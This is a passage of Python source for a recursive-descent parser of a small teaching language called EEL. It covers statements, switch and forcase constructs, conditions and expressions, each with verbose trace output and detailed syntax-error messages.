lex_unit)\n            lex()\n\n        else:\n            print(\"\"\"\n        ****************************** SYN ERROR ******************************\n\n        -Invalid Syntax\n        --After declaring the variable's scope (inout) you have to\n          name the variable (e.g. inout temp)\n        --Instead you typed something else or forgot to type it!\n\n        -Error spotted at Line: %d\n\n        ****************************** SYN ERROR ******************************\n        FORMALPARITEM()\"\"\" %(line))\n            exit()\n\n# -- <STATEMENTS> ::= <STATEMENT> (; <STATEMENT>)* -- #\ndef STATEMENTS():\n\n    if sys.argv[2] == \"-verbose\" : print(\"10.\")\n\n    global ret_token\n\n    if sys.argv[2] == \"-verbose\" : print(\"*** STATEMENTS ==> STATEMENT ***\")\n    STATEMENT()\n\n    while ret_token == token_dict[\"semiTK\"]:\n\n        if sys.argv[2] == \"-verbose\" : print(\"\\tSTATEMENTS\\t\" + lex_unit)\n        lex()\n\n        if sys.argv[2] == \"-verbose\" : print(\"*** STATEMENTS ==> STATEMENT ***\")\n        STATEMENT()\n\n    if ret_token == token_dict[\"alphaTK\"] or ret_token == token_dict[\"ifTK\"] or ret_token == token_dict[\"repTK\"] or ret_token == token_dict[\"whileTK\"] or ret_token == token_dict[\"exitTK\"] or ret_token == token_dict[\"swiTK\"] or ret_token == token_dict[\"fcaseTK\"] or ret_token == token_dict[\"callTK\"] or ret_token == token_dict[\"retTK\"] or ret_token == token_dict[\"inputTK\"] or ret_token == token_dict[\"printTK\"]:\n        print(\"\"\"\n        ****************************** SYN ERROR ******************************\n\n        -Invalid Syntax\n        --After a statement ';' is expected (unless it's the final one)\n        --Instead you typed something else or forgot to type it!\n\n        -Error spotted at Line: %d\n\n        ****************************** SYN ERROR ******************************\n        STATEMENTS()\"\"\" %(line))\n        exit()\n\n# -- <STATEMENT> ::= e | <ASSIGNMENT_STAT> | <IF_STAT> | <REPEAT_STAT> | <WHILE_STAT> | <EXIT_STAT>\n#                  | <SWITCH_STAT> | <FORCASE_STAT> | <CALL_STAT> | <RETURN_STAT> | <INPUT_STAT>\n#                  | <PRINT_STAT> -- #\ndef STATEMENT():\n\n    if sys.argv[2] == \"-verbose\" : print(\"11.\")\n\n    global ret_token\n\n    # Sneak Peeks!\n    if ret_token == token_dict[\"alphaTK\"]:\n        if sys.argv[2] == \"-verbose\" : print(\"*** STATEMENT ==> ASSIGNMENT_STAT ***\")\n        ASSIGNMENT_STAT()\n    elif ret_token == token_dict[\"ifTK\"]:\n        if sys.argv[2] == \"-verbose\" : print(\"*** STATEMENT ==> IF_STAT ***\")\n        IF_STAT()\n    elif ret_token == token_dict[\"repTK\"]:\n        if sys.argv[2] == \"-verbose\" : print(\"*** STATEMENT ==> REPEAT_STAT ***\")\n        REPEAT_STAT()\n    elif ret_token == token_dict[\"whileTK\"]:\n        if sys.argv[2] == \"-verbose\" : print(\"*** STATEMENT ==> WHILE_STAT ***\")\n        WHILE_STAT()\n    elif ret_token == token_dict[\"exitTK\"]:\n        if sys.argv[2] == \"-verbose\" : print(\"*** STATEMENT ==> EXIT_STAT ***\")\n        EXIT_STAT()\n    elif ret_token == token_dict[\"swiTK\"]:\n        if sys.argv[2] == \"-verbose\" : print(\"*** STATEMENT ==> SWITCH_STAT ***\")\n        SWITCH_STAT()\n    elif ret_token == token_dict[\"fcaseTK\"]:\n        if sys.argv[2] == \"-verbose\" : print(\"*** STATEMENT ==> FORCASE_STAT ***\")\n        FORCASE_STAT()\n    elif ret_token == token_dict[\"callTK\"]:\n        if sys.argv[2] == \"-verbose\" : print(\"*** STATEMENT ==> CALL_STAT ***\")\n        CALL_STAT()\n    elif ret_token == token_dict[\"retTK\"]:\n        if sys.argv[2] == \"-verbose\" : print(\"*** STATEMENT ==> RETURN_STAT ***\")\n        RETURN_STAT()\n    elif ret_token == token_dict[\"inputTK\"]:\n        if sys.argv[2] == \"-verbose\" : print(\"*** STATEMENT ==> INPUT_STAT ***\")\n        INPUT_STAT()\n    elif ret_token == token_dict[\"printTK\"]:\n        if sys.argv[2] == \"-verbose\" : print(\"*** STATEMENT ==> PRINT_STAT ***\")\n        PRINT_STAT()\n    elif ret_token == \"\":\n        # e : Not typing a statement is acceptable.\n        pass\n\n# -- <ASSIGNMENT_STAT> ::= ID := <EXPRESSION> -- #\ndef ASSIGNMENT_STAT():\n\n    if sys.argv[2] == \"-verbose\" : print(\"12.\")\n\n    global ret_token\n\n    if ret_token == token_dict[\"alphaTK\"]:\n\n        if sys.argv[2] == \"-verbose\" : print(\"\\tASSIGNMENT_STAT\\t\" + lex_unit)\n        lex()\n\n        if ret_token == token_dict[\"assigTK\"]:\n\n            if sys.argv[2] == \"-verbose\" : print(\"\\tASSIGNMENT_STAT\\t\" + lex_unit)\n            lex()\n\n            if sys.argv[2] == \"-verbose\" : print(\"*** ASSIGNMENT_STAT ==> EXPRESSION ***\")\n            EXPRESSION()\n\n        else:\n            print(\"\"\"\n        ****************************** SYN ERROR ******************************\n\n        -Invalid Syntax\n        --Assignment operator ':=' not found!\n\n        -Error spotted at Line: %d\n\n        ****************************** SYN ERROR ******************************\n        ASSIGNMENT_STAT()\"\"\" %(line))\n\n            exit()\n\n    # No need to display an error message here. If there was no alpha Token we wouldn't be here.\n\n# -- <IF_STAT> ::= IF <CONDITION> THEN <STATEMENTS> <ELSEPART> ENDIF -- #\ndef IF_STAT():\n\n    if sys.argv[2] == \"-verbose\" : print(\"13.\")\n\n    global ret_token\n\n    if sys.argv[2] == \"-verbose\" : print(\"\\tIF_STAT\\t\" + lex_unit)\n    lex()\n\n    if sys.argv[2] == \"-verbose\" : print(\"*** IF_STAT ==> CONDITION ***\")\n    CONDITION()\n\n    if ret_token == token_dict[\"thenTK\"]:\n\n        if sys.argv[2] == \"-verbose\" : print(\"\\tIF_STAT\\t\" + lex_unit)\n        lex()\n\n        if sys.argv[2] == \"-verbose\" : print(\"*** IF_STAT ==> STATEMENTS ***\")\n        STATEMENTS()\n\n        if sys.argv[2] == \"-verbose\" : print(\"*** IF_STAT ==> ELSEPART ***\")\n        ELSEPART()\n\n        if ret_token == token_dict[\"eifTK\"]:\n\n            if sys.argv[2] == \"-verbose\" : print(\"\\tIF_STAT\\t\" + lex_unit)\n            lex()\n\n        else:\n            print(\"\"\"\n        ****************************** SYN ERROR ******************************\n\n        -Invalid Syntax\n        --\"endif\" Committed word missing from if statement.\n        --Instead you typed something else or forgot to type it!\n        ---Example: if ... then ... 
endif\n\n -Error spotted at Line: %d\n \n ****************************** SYN ERROR ******************************\n IF_STAT()\"\"\" %(line))\n\n exit()\n \n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --\"then\" Commited word missing from if statement.\n --Instead you typed something else or forgot to type it!\n ---Example: if ... then ... endif\n\n -Error spotted at Line: %d\n \n ****************************** SYN ERROR ******************************\n IF_STAT()\"\"\" %(line))\n\n exit()\n \n# -- ::= e | ELSE -- #\ndef ELSEPART():\n\n if sys.argv[2] == \"-verbose\" : print(\"14.\")\n\n global ret_token\n\n if ret_token == token_dict[\"elseTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tELSEPART\\t\" + lex_unit)\n lex()\n \n if sys.argv[2] == \"-verbose\" : print(\"*** ELSEPART ==> STATEMENTS ***\")\n STATEMENTS()\n\n # e : Not determining an else part is acceptable.\n\n# -- ::= REPEAT ENDREPEAT -- #\ndef REPEAT_STAT():\n\n if sys.argv[2] == \"-verbose\" : print(\"15.\")\n\n global ret_token\n\n if ret_token == token_dict[\"repTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tREPEAT_STAT\\t\" + lex_unit)\n lex()\n \n if sys.argv[2] == \"-verbose\" : print(\"*** REPEAT_STAT ==> STATEMENTS ***\")\n STATEMENTS()\n\n if ret_token == token_dict[\"erepTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tREPEAT_STAT\\t\" + lex_unit)\n lex()\n \n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --\"endrepeat\" Commited word missing from repeat statement.\n --Instead you typed something else or forgot to type it!\n ---Example: repeat ... endrepeat\n\n -Error spotted at Line: %d\n \n ****************************** SYN ERROR ******************************\n REPEAT_STAT()\"\"\" %(line))\n exit()\n\n # No need to display an error message. If there was no repeat Token we wouldn't be here.\n\n# -- ::= EXIT -- #\ndef EXIT_STAT():\n\n if sys.argv[2] == \"-verbose\" : print(\"16.\")\n\n global ret_token\n\n if ret_token == token_dict[\"exitTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tEXIT_STAT\\t\" + lex_unit)\n lex()\n \n\n # No need to display an error message. If there was no exit Token we wouldn't be here.\n\n# -- ::= WHILE ENDWHILE -- #\ndef WHILE_STAT():\n\n if sys.argv[2] == \"-verbose\" : print(\"17.\")\n\n global ret_token\n\n if ret_token == token_dict[\"whileTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tWHILE_STAT\\t\" + lex_unit)\n lex()\n \n if sys.argv[2] == \"-verbose\" : print(\"*** WHILE_STAT ==> CONDITION ***\")\n CONDITION()\n\n if sys.argv[2] == \"-verbose\" : print(\"*** WHILE_STAT ==> STATEMENTS ***\")\n STATEMENTS()\n\n if ret_token == token_dict[\"ewhileTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tWHILE_STAT\\t\" + lex_unit)\n lex()\n \n # No need to display an error message. 
If there was no while Token we wouldn't be here.\n\n# -- <SWITCH_STAT> ::= SWITCH <EXPRESSION> ( CASE <EXPRESSION> : <STATEMENTS> )+ ENDSWITCH -- #\ndef SWITCH_STAT():\n\n    if sys.argv[2] == \"-verbose\" : print(\"18.\")\n\n    global ret_token\n\n    if ret_token == token_dict[\"swiTK\"]:\n\n        if sys.argv[2] == \"-verbose\" : print(\"\\tSWITCH_STAT\\t\" + lex_unit)\n        lex()\n\n        if sys.argv[2] == \"-verbose\" : print(\"*** SWITCH_STAT ==> EXPRESSION ***\")\n        EXPRESSION()\n\n        if ret_token == token_dict[\"caseTK\"]:\n\n            if sys.argv[2] == \"-verbose\" : print(\"\\tSWITCH_STAT\\t\" + lex_unit)\n            lex()\n\n            if sys.argv[2] == \"-verbose\" : print(\"*** SWITCH_STAT ==> EXPRESSION ***\")\n            EXPRESSION()\n\n            if ret_token == token_dict[\"colonTK\"]:\n\n                if sys.argv[2] == \"-verbose\" : print(\"\\tSWITCH_STAT\\t\" + lex_unit)\n                lex()\n\n                if sys.argv[2] == \"-verbose\" : print(\"*** SWITCH_STAT ==> STATEMENTS ***\")\n                STATEMENTS()\n\n                # Sneak Peek\n                while ret_token == token_dict[\"caseTK\"]:\n\n                    if sys.argv[2] == \"-verbose\" : print(\"\\tSWITCH_STAT\\t\" + lex_unit)\n                    lex()\n\n                    if sys.argv[2] == \"-verbose\" : print(\"*** SWITCH_STAT ==> EXPRESSION ***\")\n                    EXPRESSION()\n\n                    if ret_token == token_dict[\"colonTK\"]:\n\n                        if sys.argv[2] == \"-verbose\" : print(\"\\tSWITCH_STAT\\t\" + lex_unit)\n                        lex()\n\n                        if sys.argv[2] == \"-verbose\" : print(\"*** SWITCH_STAT ==> STATEMENTS ***\")\n                        STATEMENTS()\n\n                    else:\n                        print(\"\"\"\n        ****************************** SYN ERROR ******************************\n\n        -Invalid Syntax\n        --After declaring case's expression colon ':' is expected!\n        --Instead you forgot to type it or typed something else!\n        ---Example: switch ... case ... : .... endswitch\n\n        -Error spotted at Line: %d\n\n        ****************************** SYN ERROR ******************************\n        SWITCH_STAT()\"\"\" %(line))\n                        exit()\n\n                if ret_token == token_dict[\"eswiTK\"]:\n\n                    if sys.argv[2] == \"-verbose\" : print(\"\\tSWITCH_STAT\\t\" + lex_unit)\n                    lex()\n\n                else:\n                    print(\"\"\"\n        ****************************** SYN ERROR ******************************\n\n        -Invalid Syntax\n        --\"endswitch\" Committed word missing from switch statement!\n        --Instead you forgot to type it or typed something else!\n\n        -Error spotted at Line: %d\n\n        ****************************** SYN ERROR ******************************\n        SWITCH_STAT()\"\"\" %(line))\n                    exit()\n\n            else:\n                print(\"\"\"\n        ****************************** SYN ERROR ******************************\n\n        -Invalid Syntax\n        --After declaring case's expression colon ':' is expected!\n        --Instead you forgot to type it or typed something else!\n        ---Example: switch ... case ... : .... endswitch\n\n        -Error spotted at Line: %d\n\n        ****************************** SYN ERROR ******************************\n        SWITCH_STAT()\"\"\" %(line))\n                exit()\n\n        else:\n            print(\"\"\"\n        ****************************** SYN ERROR ******************************\n\n        -Invalid Syntax\n        --After declaring the switch at least one case is required!\n        --Instead you forgot to type it or typed something else!\n        ---Example: switch ... case ... : .... endswitch\n\n        -Error spotted at Line: %d\n\n        ****************************** SYN ERROR ******************************\n        SWITCH_STAT()\"\"\" %(line))\n            exit()\n\n    # No need to display an error message. 
If there was no switch Token we wouldn't be here.\n\n# -- ::= FORCASE ( WHEN : )+ ENDFORCASE -- #\ndef FORCASE_STAT():\n\n if sys.argv[2] == \"-verbose\" : print(\"19.\")\n\n global ret_token\n\n if ret_token == token_dict[\"fcaseTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tFORCASE_STAT\\t\" + lex_unit)\n lex()\n\n if ret_token == token_dict[\"whenTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tFORCASE_STAT\\t\" + lex_unit)\n lex()\n \n if sys.argv[2] == \"-verbose\" : print(\"*** FORCASE_STAT ==> CONDITION ***\")\n CONDITION()\n\n if ret_token == token_dict[\"colonTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tFORCASE_STAT\\t\" + lex_unit)\n lex()\n \n if sys.argv[2] == \"-verbose\" : print(\"*** FORCASE_STAT ==> STATEMENTS ***\")\n STATEMENTS()\n\n # Sneak Peek\n while ret_token == token_dict[\"whenTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tFORCASE_STAT\\t\" + lex_unit)\n lex()\n \n if sys.argv[2] == \"-verbose\" : print(\"*** FORCASE_STAT ==> CONDITION ***\")\n CONDITION()\n\n if ret_token == token_dict[\"colonTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tFORCASE_STAT\\t\" + lex_unit)\n lex()\n\n if sys.argv[2] == \"-verbose\" : print(\"*** FORCASE_STAT ==> STATEMENTS ***\")\n STATEMENTS()\n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n -Invalid Syntax\n --After declaring forcase's condition colon ':' is expected\n --Instead you forgot to type it or typed something else!\n ---Example: forcase when ... : ... endforcase\n\n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n FORCASE_STAT()\"\"\" %(line))\n exit()\n\n if ret_token == token_dict[\"efcaseTK\"]: \n\n if sys.argv[2] == \"-verbose\" : print(\"\\tFORCASE_STAT\\t\" + lex_unit)\n lex()\n \n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --\"endforcase\" Commited word missing from forcase statement!\n --Instead you forgot to type it or typed something else!\n\n -Error spotted at Line: %d\n \n ****************************** SYN ERROR ******************************\n FORCASE_STAT()\"\"\" %(line))\n exit()\n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --After declaring forcase's condition colon ':' is expected\n --Instead you forgot to type it or typed something else!\n ---Example: forcase when ... : ... endforcase\n\n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n FORCASE_STAT()\"\"\" %(line))\n exit()\n\n else: \n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --\"when\" Commited word expected after forcase!\n --Instead you forgot to type it or typed something else!\n ---Example: forcase when ... : ... 
endforcase\n\n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n FORCASE_STAT()\"\"\" %(line))\n exit()\n\n# -- ::= CALL ID -- #\ndef CALL_STAT():\n\n if sys.argv[2] == \"-verbose\" : print(\"20.\")\n\n global ret_token \n\n if ret_token == token_dict[\"callTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tCALL_STAT\\t\" + lex_unit)\n lex()\n \n if ret_token == token_dict[\"alphaTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tCALL_STAT\\t\" + lex_unit)\n lex()\n \n if sys.argv[2] == \"-verbose\" : print(\"*** CALL_STAT ==> ACTUALPARS ***\")\n ACTUALPARS()\n\n else: \n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --Function's/Procedure's name is expected after call!\n --Instead you forgot to type it or typed something else!\n ---Example: call function1( ... )\n\n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n CALL_STAT()\"\"\" %(line))\n\n exit()\n\n# -- ::= RETURN -- #\ndef RETURN_STAT():\n\n if sys.argv[2] == \"-verbose\" : print(\"21.\")\n\n global ret_token\n\n if ret_token == token_dict[\"retTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tRETURN_STAT\\t\" + lex_unit)\n lex() \n \n if sys.argv[2] == \"-verbose\" : print(\"*** RETURN_STAT ==> EXPRESSION ***\")\n EXPRESSION()\n\n # No need to display an error message. If there was no return Token we wouldn't be here.\n\n# -- ::= PRINT -- #\ndef PRINT_STAT():\n\n if sys.argv[2] == \"-verbose\" : print(\"22.\")\n\n global ret_token\n\n if ret_token == token_dict[\"printTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tPRINT_STAT\\t\" + lex_unit)\n lex()\n \n if sys.argv[2] == \"-verbose\" : print(\"*** PRINT_STAT ==> EXPRESSION ***\")\n EXPRESSION()\n # No need to display an error message. 
If there was no print Token we wouldn't be here.\n\n# -- ::= ( ) -- #\ndef ACTUALPARS():\n\n if sys.argv[2] == \"-verbose\" : print(\"23.\")\n\n global ret_token\n\n if ret_token == token_dict[\"lbrTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tACTUALPARS\\t\" + lex_unit)\n lex()\n \n if sys.argv[2] == \"-verbose\" : print(\"*** ACTUALPARS ==> ACTUALPARLIST ***\")\n ACTUALPARLIST()\n\n if ret_token == token_dict[\"rbrTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tACTUALPARS\\t\" + lex_unit)\n lex()\n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --After declaring the parameters right bracket character ')'\n is required\n --Instead you forgot to type it or typed something else!\n \n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n ACTUALPARS()\"\"\" %(line))\n exit()\n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --To start declaring the parameters left bracket character '('\n is required\n --Instead you forgot to type it or typed something else!\n \n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n ACTUALPARS()\"\"\" %(line))\n exit()\n\n# -- ::= (, )* | e -- #\ndef ACTUALPARLIST():\n\n if sys.argv[2] == \"-verbose\" : print(\"24.\")\n\n global ret_token\n\n # Sneak Peek\n if ret_token == token_dict[\"inTK\"] or ret_token == token_dict[\"inoutTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"*** ACTUALPARLIST ==> ACTUALPARITEM ***\")\n ACTUALPARITEM()\n\n while ret_token == token_dict[\"commaTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tACTUALPARLIST\\t\" + lex_unit)\n lex()\n\n if sys.argv[2] == \"-verbose\" : print(\"*** ACTUALPARLIST ==> ACTUALPARITEM ***\")\n ACTUALPARITEM()\n\n # e : Not defining an actual parameter is acceptable.\n\n# -- ::= IN | INOUT ID -- #\ndef ACTUALPARITEM():\n\n if sys.argv[2] == \"-verbose\" : print(\"25.\")\n\n global ret_token\n\n if ret_token == token_dict[\"inTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tACTUALPARITEM\\t\" + lex_unit)\n lex()\n \n if sys.argv[2] == \"-verbose\" : print(\"*** ACTUALPARITEM ==> EXPRESSION ***\")\n EXPRESSION()\n\n elif ret_token == token_dict[\"inoutTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tACTUALPARITEM\\t\" + lex_unit)\n lex()\n\n if ret_token == token_dict[\"alphaTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tACTUALPARITEM\\t\" + lex_unit)\n lex()\n\n else: \n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --Passing by reference without declaring variable name detected! 
\n\n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n ACTUALPARITEM()\"\"\" %(line))\n\n exit()\n\n# -- ::= ( OR )* -- #\ndef CONDITION():\n\n if sys.argv[2] == \"-verbose\" : print(\"26.\")\n\n global ret_token \n\n if sys.argv[2] == \"-verbose\" : print(\"*** CONDITION ==> BOOLTERM ***\")\n BOOLTERM()\n\n while ret_token == token_dict[\"orTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tCONDITION\\t\" + lex_unit)\n lex()\n \n if sys.argv[2] == \"-verbose\" : print(\"*** CONDITION ==> BOOLTERM ***\")\n BOOLTERM()\n\n# -- ::= ( AND )* -- #\ndef BOOLTERM():\n\n if sys.argv[2] == \"-verbose\" : print(\"27.\")\n\n global ret_token\n\n if sys.argv[2] == \"-verbose\" : print(\"*** BOOLTERM ==> BOOLFACTOR ***\")\n BOOLFACTOR()\n\n while ret_token == token_dict[\"andTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tBOOLTERM\\t\" + lex_unit)\n lex()\n\n if sys.argv[2] == \"-verbose\" : print(\"*** BOOLTERM ==> BOOLFACTOR ***\")\n BOOLFACTOR()\n\n# -- ::= NOT [ ] | [ ] | \n# | TRUE | FALSE -- #\ndef BOOLFACTOR():\n \n if sys.argv[2] == \"-verbose\" : print(\"28.\")\n\n global ret_token\n \n if ret_token == token_dict[\"notTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tBOOLFACTOR\\t\" + lex_unit)\n lex()\n\n if ret_token == token_dict[\"blbrTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tBOOLFACTOR\\t\" + lex_unit)\n lex()\n \n if sys.argv[2] == \"-verbose\" : print(\"*** BOOLFACTOR ==> CONDITION ***\")\n CONDITION()\n\n if ret_token == token_dict[\"brbrTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tBOOLFACTOR\\t\" + lex_unit)\n lex()\n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --After declaring a condition you have to put ']'\n --Instead you forgot to type it or typed something else!\n ---Example: not [a operator b]\n\n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n BOOLFACTOR()\"\"\" %(line))\n\n exit()\n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --Before declaring a condition you have to put '['\n --Instead you forgot to type it or typed something else!\n ---Example: not [a operator b]\n\n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n BOOLFACTOR()\"\"\" %(line))\n\n exit()\n\n elif ret_token == token_dict[\"blbrTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tBOOLFACTOR\\t\" + lex_unit)\n lex()\n \n if sys.argv[2] == \"-verbose\" : print(\"*** BOOLFACTOR ==> CONDITION ***\")\n CONDITION()\n\n if ret_token == token_dict[\"brbrTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tBOOLFACTOR\\t\" + lex_unit)\n lex()\n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --After declaring a condition you have to put ']'\n --Instead you forgot to type it or typed something else!\n ---Example: not [a operator b]\n\n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n BOOLFACTOR()\"\"\" %(line))\n\n exit()\n\n # Sneak Peek\n elif ret_token == token_dict[\"plusTK\"] or ret_token == token_dict[\"minusTK\"] or ret_token == token_dict[\"numberTK\"] or ret_token == token_dict[\"lbrTK\"] or ret_token == token_dict[\"alphaTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"*** BOOLFACTOR ==> EXPRESSION ***\")\n EXPRESSION()\n if 
sys.argv[2] == \"-verbose\" : print(\"*** BOOLFACTOR ==> RELATIONAL_OPER ***\")\n RELATIONAL_OPER()\n if sys.argv[2] == \"-verbose\" : print(\"*** BOOLFACTOR ==> EXPRESSION ***\")\n EXPRESSION()\n\n elif ret_token == token_dict[\"trueTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tBOOLFACTOR\\t\" + lex_unit)\n lex()\n\n elif ret_token == token_dict[\"falseTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tBOOLFACTOR\\t\" + lex_unit)\n lex()\n\n# -- ::= ( )* -- #\ndef EXPRESSION(): \n\n if sys.argv[2] == \"-verbose\" : print(\"29.\")\n\n global ret_token\n\n if sys.argv[2] == \"-verbose\" : print(\"*** EXPRESSION ==> OPTIONAL_SIGN ***\")\n OPTIONAL_SIGN()\n if sys.argv[2] == \"-verbose\" : print(\"*** EXPRESSION ==> TERM ***\")\n TERM()\n\n #Sneak Peek\n while( ret_token == token_dict[\"plusTK\"] or ret_token == token_dict[\"minusTK\"] ):\n\n if sys.argv[2] == \"-verbose\" : print(\"*** EXPRESSION ==> ADD_OPER ***\")\n ADD_OPER()\n if sys.argv[2] == \"-verbose\" : print(\"*** EXPRESSION ==> TERM ***\")\n TERM()\n\n# -- ::= ( )* -- #\ndef TERM():\n\n if sys.argv[2] == \"-verbose\" : print(\"30.\")\n\n global ret_token\n\n if sys.argv[2] == \"-verbose\" : print(\"*** TERM ==> FACTOR ***\")\n FACTOR()\n\n #Sneak Peek\n while(ret_token == token_dict[\"mulTK\"] or ret_token == token_dict[\"divTK\"]):\n\n if sys.argv[2] == \"-verbose\" : print(\"*** TERM ==> MUL_OPER ***\")\n MUL_OPER()\n if sys.argv[2] == \"-verbose\" : print(\"*** TERM ==> FACTOR ***\")\n FACTOR()\n\n# -- ::= COSTANT | ( ) | ID -- #\ndef FACTOR():\n\n if sys.argv[2] == \"-verbose\" : print(\"31.\")\n\n global ret_token\n\n if ret_token == token_dict[\"numberTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tFACTOR\\t\" + lex_unit)\n lex()\n\n elif ret_token == token_dict[\"lbrTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tFACTOR\\t\" + lex_unit)\n lex()\n \n if sys.argv[2] == \"-verbose\" : print(\"\\tFACTOR\\t\" + lex_unit)\n EXPRESSION()\n\n if ret_token == token_dict[\"rbrTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tFACTOR\\t\" + lex_unit)\n lex()\n\n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --After declaring an expression you have to put ')'\n --Instead you forgot to type it or typed something else!\n ---Example: ( expression )\n\n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n FACTOR()\"\"\" %(line))\n\n exit()\n\n elif ret_token == token_dict[\"alphaTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tFACTOR\\t\" + lex_unit)\n lex()\n\n if sys.argv[2] == \"-verbose\" : print(\"*** FACTOR ==> IDTAIL ***\")\n IDTAIL()\n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --Invalid FACTOR used!\n ---[NOTE]: Read EEL's documentation file to see which\n options are available for factor usage.\n\n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n FACTOR()\"\"\" %(line))\n\n exit()\n\n# -- ::= e | -- #\ndef IDTAIL():\n\n if sys.argv[2] == \"-verbose\" : print(\"32.\")\n\n global ret_token\n\n if ret_token == token_dict[\"lbrTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"*** IDTAIL ==> ACTUALPARS ***\")\n ACTUALPARS()\n\n # e : No statements after an ID is acceptable.\n\n# -- ::= = | <= | >= | > | < | <> -- #\ndef RELATIONAL_OPER():\n\n if sys.argv[2] == \"-verbose\" : print(\"33.\")\n\n global ret_token \n\n if ret_token == 
token_dict[\"eqTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tRELATIONAL_OPER\\t\" + lex_unit)\n lex()\n\n elif ret_token == token_dict[\"leqTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tRELATIONAL_OPER\\t\" + lex_unit)\n lex()\n\n elif ret_token == token_dict[\"greqTK\"]:\n \n if sys.argv[2] == \"-verbose\" : print(\"\\tRELATIONAL_OPER\\t\" + lex_unit)\n lex()\n\n elif ret_token == token_dict[\"greaTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tRELATIONAL_OPER\\t\" + lex_unit)\n lex()\n\n elif ret_token == token_dict[\"lessTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tRELATIONAL_OPER\\t\" + lex_unit)\n lex()\n\n elif ret_token == token_dict[\"difTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tRELATIONAL_OPER\\t\" + lex_unit)\n lex()\n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --Invalid RELATIONAL OPERATOR used!\n ---[NOTE]: Read EEL's documentation file to see which\n options are available for relational op usage!\n\n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n RELATIONAL_OPER()\"\"\" %(line))\n exit()\n\n# -- ::= + | - -- #\ndef ADD_OPER():\n\n if sys.argv[2] == \"-verbose\" : print(\"34.\")\n\n global ret_token\n\n if ret_token == token_dict[\"plusTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tADD_OPER\\t\" + 